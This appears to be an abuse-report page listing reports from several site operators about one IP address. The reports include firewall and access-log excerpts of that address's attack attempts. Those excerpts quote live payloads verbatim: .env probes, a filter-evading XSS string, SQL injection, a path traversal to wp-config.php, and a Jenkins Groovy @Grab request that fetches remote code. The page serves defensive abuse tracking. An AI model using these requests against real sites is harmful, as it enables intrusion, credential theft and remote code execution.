🇺🇸
integrantservices.com
2026-08-07 01:40:29
(1 month ago)
(wordpress) Failed wordpress login from 64.112.57.190 (US/United States/-)
Brute-Force
🇲🇽
octageeks.com
2026-08-04 04:14:31
(1 month ago)
Wordpress malicious attack:[octablocked]
Web App Attack
🇺🇸
TPI-Abuse
2026-08-04 03:49:10
(1 month ago)
(mod_security) mod_security (id:225170) triggered by 64.112.57.190 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:225170) triggered by 64.112.57.190 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Aug 03 23:48:54.728435 2026] [security2:error] [pid 602981:tid 602981] [client 64.112.57.190:42593] ModSecurity: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.nancyscafeandcatering.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.nancyscafeandcatering.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "anFhJpvYurb7GdPT_n6M3QAAACE"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇫🇷
conseilgouz
2026-08-04 03:43:53
(1 month ago)
loe-6 : Trying access system files=>/component/finder/search?Itemid=101'(htaccessphp)
Hacking
🇺🇸
TPI-Abuse
2026-08-03 20:18:20
(1 month ago)
(mod_security) mod_security (id:210492) triggered by 64.112.57.190 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:210492) triggered by 64.112.57.190 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Aug 03 16:18:00.489718 2026] [security2:error] [pid 3353134:tid 3353134] [client 64.112.57.190:56977] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "120"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.thegoldentether.com"] [uri "/.env.production.local"] [unique_id "anD3ePwZs1bg-K6I8FwLqwAAAAQ"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇺🇸
TPI-Abuse
2026-08-03 18:28:07
(1 month ago)
(mod_security) mod_security (id:212620) triggered by 64.112.57.190 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:212620) triggered by 64.112.57.190 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Aug 03 14:27:42.061724 2026] [security2:error] [pid 577204:tid 577204] [client 64.112.57.190:40629] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<script\\\\b" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/07_XSS_XSS.conf"] [line "65"] [id "212620"] [rev "4"] [msg "COMODO WAF: Cross-site Scripting (XSS) Attack||3905ccn.org|F|2"] [data "Matched Data: <script found within REQUEST_URI: /ncscalendar.php?year=2025&action=go<scr<script>ipt>alert(qsxss9k7z)</scr</script>ipt>&month=01&band=[all]&mode=[all]&ncscallsign=[all]"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "3905ccn.org"] [uri "/ncsCalendar.php"] [unique_id "anDdntRI_iVtI2AhLjHK_gAAABI"]
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2026-08-03 17:35:05
(1 month ago)
suspicious request in access.log
Web App Attack
🇺🇸
TPI-Abuse
2026-08-03 14:54:48
(1 month ago)
(mod_security) mod_security (id:210492) triggered by 64.112.57.190 (-): 1 in the last 300 secs; Port ...
show more
(mod_security) mod_security (id:210492) triggered by 64.112.57.190 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Aug 03 10:54:26.349589 2026] [security2:error] [pid 299653:tid 299653] [client 64.112.57.190:60703] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.powerkiteforum.com"] [uri "/.env.prod"] [unique_id "anCrotlF5Yc8gVSBTdHwJwAAAAw"]
show less
Brute-Force
Bad Web Bot
Web App Attack
🇺🇸
ipblock.com
2026-08-03 09:27:00
(1 month ago)
IPBlock protected site ID [4055-d][s=07].
Exploit request, vulnerability scanner.
Hacking
Bad Web Bot
Web App Attack
🇫🇷
mikekarl
2026-07-27 14:58:21
(1 month ago)
SQL INJECTION booking_2_kiosk''
SQL Injection
🇺🇸
nodepile
2026-07-25 11:28:11
(1 month ago)
Requests denied due to active blacklist hits (tenant=82 method=POST path=/checkout/cart/add/uenc/aHR ...
show more
Requests denied due to active blacklist hits (tenant=82 method=POST path=/checkout/cart/add/uenc/aHR0cHM6Ly91bW5pdHphLmNvbS93aGVlbHMuaHRtbD9jYXQ9/product/11532/ ua='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36')
show less
Web App Attack
Exploited Host
🇺🇸
ipblock.com
2026-07-18 22:40:00
(1 month ago)
IPBlock protected site ID [4730-fr].
Exploit request, vulnerability scanner.
Hacking
Bad Web Bot
Web App Attack
🇩🇪
HandyTreff.de
2026-07-18 16:27:59
(1 month ago)
Bot/Spam/Scrapper attack detected on www.handytreff.de - Score: -78.222 (Bad < -10 / Very Bad < -20 ...
show more
Bot/Spam/Scrapper attack detected on www.handytreff.de - Score: -78.222 (Bad < -10 / Very Bad < -20 / Extreme < -35) | UA: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.
show less
Web App Attack
Bad Web Bot
🇺🇸
ipblock.com
2026-07-17 10:03:00
(1 month ago)
IPBlock protected site ID [4055-d][s=06].
Exploit request, vulnerability scanner.
Hacking
Bad Web Bot
Web App Attack
🇺🇸
TheJimmo
2026-07-16 13:46:31
(1 month ago)
64.112.57.190 64.112.57.190 - - [16/Jul/2026:13:45:34 +0000] "POST /wp-content/plugins/wsecure/wsecu ...
show more
64.112.57.190 64.112.57.190 - - [16/Jul/2026:13:45:34 +0000] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 13411 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
64.112.57.190 64.112.57.190 - - [16/Jul/2026:13:45:35 +0000] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 13760 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
64.112.57.190 64.112.57.190 - - [16/Jul/2026:13:45:36 +0000] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 13
...
show less
Bad Web Bot
Web App Attack